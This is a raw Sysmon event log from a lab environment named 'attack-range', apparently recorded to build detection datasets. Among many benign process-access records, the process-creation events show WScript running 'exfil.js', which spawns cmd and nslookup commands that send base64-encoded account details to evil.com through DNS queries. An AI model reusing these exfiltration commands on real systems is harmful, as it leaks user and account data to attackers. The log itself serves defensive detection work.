14:16:28.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199486Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199485Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.053{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199484Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.053{2E1864BB-17A1-629A-783D-000000005F02}55527380C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-1740-000000005F02}7964C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199483Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.066{2E1864BB-17BC-629A-1740-000000005F02}7964C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljgd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199482Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.053{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlczlg.tmpMD5=FA64F29A2105005DB944F49BBF99C790,SHA256=AFC24D0EC0C7AAB04F6CC9902001B05F5184E11791617287F2A4C4C94A76A48D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199481Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.037{2E1864BB-17BC-629A-1540-000000005F02}66522088C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1640-000000005F02}7292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199480Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199479Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199478Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199477Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.037{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199476Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.037{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1640-000000005F02}7292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199475Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.037{2E1864BB-17BC-629A-1440-000000005F02}64087416C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-1640-000000005F02}7292C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199474Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.039{2E1864BB-17BC-629A-1640-000000005F02}7292C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-1440-000000005F02}6408C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlczlg.tmp 2>&1 10341000x8000000000000000199473Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.006{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1540-000000005F02}6652C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199472Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.006{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1540-000000005F02}6652C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199471Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.006{2E1864BB-17BC-629A-1540-000000005F02}66522088C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1440-000000005F02}6408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199470Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.006{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1540-000000005F02}6652C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199469Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199468Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199467Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199466Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.002{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199465Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.001{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1440-000000005F02}6408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199464Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.001{2E1864BB-17A1-629A-783D-000000005F02}55525604C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-1440-000000005F02}6408C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199463Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.001{2E1864BB-17BC-629A-1440-000000005F02}6408C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlczlg.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x800000000000000043933Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:16:28.307{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=614FAFFB7DEBB1F8EF4875DF8A4A4C78,SHA256=25453308D1924071CDE148CDA38BABFC6A3D44F4426CC05919957143B5E0B432,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.949{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-4240-000000005F02}4360C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.949{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BD-629A-4240-000000005F02}4360C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.935{2E1864BB-17BD-629A-4240-000000005F02}43606712C:\Windows\system32\conhost.exe{2E1864BB-17BD-629A-4140-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.918{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-4240-000000005F02}4360C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.917{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17BD-629A-4140-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:29.914{2E1864BB-17A1-629A-783D-000000005F02}55524176C:\Windows\System32\WScript.exe{2E1864BB-17BD-629A-4140-000000005F02}6660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 